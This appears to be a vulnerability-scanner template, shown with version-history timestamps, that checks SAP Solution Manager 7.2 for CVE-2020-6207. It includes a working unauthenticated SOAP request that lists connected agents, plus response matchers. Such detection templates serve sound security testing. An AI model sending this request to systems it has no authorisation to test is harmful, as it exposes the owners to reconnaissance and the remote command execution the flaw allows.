2021-07-05 17:36:55 +00:00
id : CVE-2020-6207
info :
2022-04-29 19:58:07 +00:00
name : SAP Solution Manager 7.2 - Remote Command Execution
2021-07-05 17:36:55 +00:00
author : _generic_human_
severity : critical
2022-05-17 09:18:12 +00:00
description : SAP Solution Manager (SolMan) running version 7.2 has a remote command execution vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem). The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent.
2021-07-05 17:36:55 +00:00
reference :
- https://launchpad.support.sap.com/#/notes/2890213
- https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305
- https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf
- https://github.com/chipik/SAP_EEM_CVE-2020-6207
- https://www.rapid7.com/db/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce/
- https://www.rapid7.com/db/modules/exploit/multi/sap/cve_2020_6207_solman_rs/
2022-04-29 19:58:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-6207
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-6207
cwe-id : CWE-306
2022-07-21 17:18:22 +00:00
tags : cve,cve2020,sap,solman,rce,kev
2021-07-05 17:36:55 +00:00
requests :
- raw :
- |
POST /EemAdminService/EemAdmin HTTP/1.1
Host : {{Hostname}}
SOAPAction : ""
Content-Type : text/xml; charset=UTF-8
Connection : close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:adm="http://sap.com/smd/eem/admin/"><soapenv:Header/><soapenv:Body><adm:getAllAgentInfo/></soapenv:Body></soapenv:Envelope>
matchers-condition : and
matchers :
- type : word
words :
- ":Envelope"
- ":Body"
- ":getAllAgentInfoResponse"
part : body
condition : and
- type : status
status :
- 200
- type : word
words :
- "text/xml"
- "SAP NetWeaver Application Server"
part : header
condition : and
2022-04-29 19:58:07 +00:00
# Enhanced by mp on 2022/04/29